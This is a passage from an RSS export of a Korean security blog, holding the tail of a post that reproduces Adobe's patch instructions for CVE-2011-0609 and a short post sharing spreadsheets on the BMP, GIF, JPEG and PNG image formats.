&lt;SPAN style=&quot;WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: medium '맑은 고딕'; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-size-adjust: auto; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-stroke-width: 0px&quot; class=Apple-style-span&gt;&lt;SPAN style=&quot;LINE-HEIGHT: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: rgb(51,51,51); FONT-SIZE: 12px&quot; class=Apple-style-span&gt;&lt;/P&gt;
&lt;H3 style=&quot;BORDER-BOTTOM: rgb(203,203,203) 3px solid; PADDING-BOTTOM: 4px; LINE-HEIGHT: 1.455; TEXT-TRANSFORM: uppercase; MARGIN: 0px 0px 0.85em; MIN-HEIGHT: 1em; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(34,34,34); FONT-SIZE: 0.91em; PADDING-TOP: 4px&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;SOLUTION&lt;/H3&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe recommends all users of Adobe Flash Player 10.2.152.33 and earlier versions upgrade to the newest version 10.2.153.1 by downloading it from the&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://get.adobe.com/flashplayer/&quot;&gt;&lt;SPAN class=Apple-converted-space&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe Flash Player Download Center&lt;/A&gt;. Windows users can install the update via the auto-update mechanism within the product when prompted.&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Users of Flash Player for Android version 10.1.106.16 and earlier can update to Flash Player version 10.2.156.12 by &lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;market://details/?id=com.adobe.flashplayer&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;browsing to the Android Marketplace on an Android phone&lt;/A&gt;.&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Google Chrome users can update to&lt;SPAN class=Apple-converted-space&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://googlechromereleases.blogspot.com/2011/03/stable-and-beta-channel-updates_15.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Chrome version 10.0.648.134&lt;/A&gt;&lt;SPAN class=Apple-converted-space&gt;&amp;nbsp;&lt;/SPAN&gt;or later.&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe AIR&lt;SPAN class=Apple-converted-space&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;br /&gt;
Adobe recommends all users of Adobe AIR 2.5.1 and earlier versions update to the newest version 2.6 by downloading it from the&lt;SPAN class=Apple-converted-space&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://get.adobe.com/air/&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe AIR Download Center&lt;/A&gt;.&lt;SPAN id=tx_afterend_mark&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;SPAN id=tx_afterend_mark&gt;&lt;/SPAN&gt;
&lt;P&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Verdana&quot;&gt;Security updates available for Adobe Reader and Acrobat&lt;SPAN id=tx_afterend_mark&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/FONT&gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.adobe.com/support/security/bulletins/apsb11-06.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/security/bulletins/apsb11-06.html&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;SPAN style=&quot;WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: medium '맑은 고딕'; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-size-adjust: auto; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-stroke-width: 0px&quot; class=Apple-style-span&gt;&lt;SPAN style=&quot;LINE-HEIGHT: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: rgb(51,51,51); FONT-SIZE: 12px&quot; class=Apple-style-span&gt;&lt;/P&gt;
&lt;H3 style=&quot;BORDER-BOTTOM: rgb(203,203,203) 3px solid; PADDING-BOTTOM: 4px; LINE-HEIGHT: 1.455; TEXT-TRANSFORM: uppercase; MARGIN: 0px 0px 0.85em; MIN-HEIGHT: 1em; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(34,34,34); FONT-SIZE: 0.91em; PADDING-TOP: 4px&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;SOLUTION&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe recommends users update their software installations by following the instructions below:&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe Reader&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Users on Windows and Macintosh can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help &amp;gt; Check for Updates.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe Reader 9.x users on Windows can also find the appropriate update here:&lt;/SPAN&gt;&lt;br /&gt;
&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Windows&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Windows&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe Reader users on Macintosh can also find the appropriate update here:&lt;/SPAN&gt;&lt;br /&gt;
&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Macintosh&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/downloads/product.jsp?product=10&amp;amp;platform=Macintosh&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;STRONG&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Adobe Acrobat&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Users can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help &amp;gt; Check for Updates.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Acrobat Standard and Pro users on Windows can also find the appropriate update here:&lt;/SPAN&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/downloads/product.jsp?product=1&amp;amp;platform=Windows&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/downloads/product.jsp?product=1&amp;amp;platform=Windows&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Acrobat Pro Extended users on Windows can also find the appropriate update here:&lt;/SPAN&gt;&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/downloads/product.jsp?product=158&amp;amp;platform=Windows&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/downloads/product.jsp?product=158&amp;amp;platform=Windows&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;Acrobat Pro users on Macintosh can also find the appropriate update here:&lt;/SPAN&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/downloads/product.jsp?product=1&amp;amp;platform=Macintosh&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/downloads/product.jsp?product=1&amp;amp;platform=Macintosh&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;.&lt;/SPAN&gt;&lt;/P&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-135-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-135-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-135-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/135&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>Acrobat</category>
			<category>adobe</category>
			<category>CVE-2011-0609</category>
			<category>Flash Player</category>
			<category>reader</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/135</guid>
			<comments>http://malwarelab.tistory.com/entry/Security-updates-available-for-Adobe-CVE-2011-0609#entry135comment</comments>
			<pubDate>Tue, 22 Mar 2011 09:57:25 +0900</pubDate>
		</item>
		<item>
			<title>Image File Format (JPEG, GIF, BMP) - update! PNG 추가!</title>
			<link>http://malwarelab.tistory.com/entry/Image-File-Format-JPEG-GIF-BMP-update-PNG-%EC%B6%94%EA%B0%80</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;지난 코드게이트 예선전 참여하면서 생각이 나서 인터넷을 뒤져 몇 가지 파일 포맷에 대해서 정리해봤습니다.&lt;br /&gt;
&lt;br /&gt;도식화 된 자료는 BMP 밖에 구하질 못해 엑셀에 직접 그려봤습니다. -_-ㅋ&lt;br /&gt;
&lt;br /&gt;BMP, JPEG, GIF만 일단 정리했습니다. 급하게 한거라 모든 내용을 다 싣지는 못했습니다.&lt;br /&gt;
&lt;br /&gt;다만 저의 입장에서(보안? 포렌식?) 필요한 부분들이나 필요한 방향으로 정리했습니다.&lt;br /&gt;
&lt;br /&gt;&lt;STRIKE&gt;PNG는 내일이나 모레쯤 작성할 예정입니다.&lt;/STRIKE&gt;&lt;br /&gt;
&lt;br /&gt;PNG 추가했습니다~&lt;br /&gt;
&lt;br /&gt;혹시나 잘못된 부분이 있다면 알려주시면 감사하겠습니다~&lt;br /&gt;
&lt;br /&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;br /&gt;
&amp;nbsp;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile24.uf@166252524D7F286C344401.xls&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/xls.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; bmp.xls&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile30.uf@166F93524D7F286E1C669D.xls&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/xls.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; gif.xls&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile29.uf@136F23524D7F286F215990.xls&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/xls.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; jpeg.xls&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile22.uf@1103ED354D8306BD2CA443.xls&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/blog/image/extension/xls.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; png.xls&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;도움이 되셨으면 좋겠습니다. ^^&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
p.s 다른 파일 포맷(doc, xls, ppt, pps, pdf 등등)에 대해서도 공부해볼 생각입니다.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;정리되면 나머지도 올리도록 하겠습니다~&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-134-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-134-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-134-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/134&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
